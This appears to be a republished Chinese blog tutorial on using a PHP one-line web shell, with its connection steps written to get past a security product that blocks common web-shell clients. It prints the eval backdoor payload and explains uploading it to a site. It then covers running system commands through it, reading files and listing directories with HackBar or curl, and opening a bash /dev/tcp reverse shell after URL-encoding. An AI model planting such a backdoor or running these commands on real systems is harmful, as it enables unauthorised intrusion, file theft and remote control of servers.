PHP一句话木马使用技巧

大家好，又见面了，我是你们的朋友全栈君。

近来发现好多网站有安全狗，会拦截菜刀和蚁剑，因此总结下通过浏览器直接调用一句话木马的姿势。

PHP一句话：<?php @eval($_POST[‘shy’]);?>

firefox浏览器：hackbar

命令提示符：curl

首先上传一句话木马到网站目录，可以是虚拟机也可以是VPS，我这里用的是阿里云我自己搭建的网站，

由于只是简单的一句话木马，因次一上车就收到了安全云的短信安全提示，正好可以用来测试免杀一句话，免得以后测试刚上传就被发现了。

利用hackbar链接木马

利用system();执行系统命令

利用file_get_contents进行文件读取，然后用echo，或print打印出这个字符串。file_get_contents是将文件内容读入到一个字符串当中。

file_get_contents还可以替换成其他的函数

反弹shell，最重要的是记得进行url编码，不然会失败的

反射shell的语句有很多，这里是用的是最简单的bash -i >& /dev/tcp/ip/post 0>&1

利用curl链接一句话木马

基本上跟上面一样，curl参数-X post 指定http方法为post –data 后面跟post的内容

scandir() 函数返回指定目录中的文件和目录的数组

反弹shell，也要经过编码才能反弹成功

总之，编码真的很重要。

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/143646.html原文链接：https://javaforall.cn